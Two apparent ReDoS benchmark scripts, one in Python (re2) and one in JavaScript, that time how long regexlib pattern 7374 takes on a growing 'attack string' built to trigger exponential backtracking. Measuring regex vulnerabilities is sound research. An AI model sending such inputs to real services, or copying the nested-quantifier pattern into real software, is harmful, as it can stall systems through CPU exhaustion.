File: regexlib/python_re2_test_file/regexlib_7374.py
# 7374
# [^(\&amp;)](\w*)+(\=)[\w\d ]*
# EXPONENT
# nums:5
# EXPONENT AttackString:" "+"1"*32+"@1 __NQ"

import re2 as re
from time import perf_counter

regex = """[^(\&amp;)](\w*)+(\=)[\w\d ]*"""
REGEX = re.compile(regex)
for i in range(0, 150000):
    ATTACK = " " + "1" * i * 1 + "@1 __NQ"
    LEN = len(ATTACK)
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *1}: took {DURATION} seconds!")

File: regexlib/javascript_test_file/regexlib_7374.js
/* 7374
 * [^(\&amp;)](\w*)+(\=)[\w\d ]*
 * EXPONENT
 * nums:3
 * EXPONENT AttackString:" "+"1"*32+"@1 __NQ"
 */
var REGEX = /[^(\&amp;)](\w*)+(\=)[\w\d ]*/
for(var i = 1; i <= 5000000; i++) {
    var time = Date.now();
    var attack_str = ' ' + '1'.repeat(i*1) + '@1 __NQ'
    REGEX.exec(attack_str)
    // REGEX.test(attack_str);
    // attack_str.search(REGEX)
    // attack_str.match(REGEX)
    var time_cost = Date.now() - time;
    console.log(i * 1 + ": " + time_cost+" ms")
}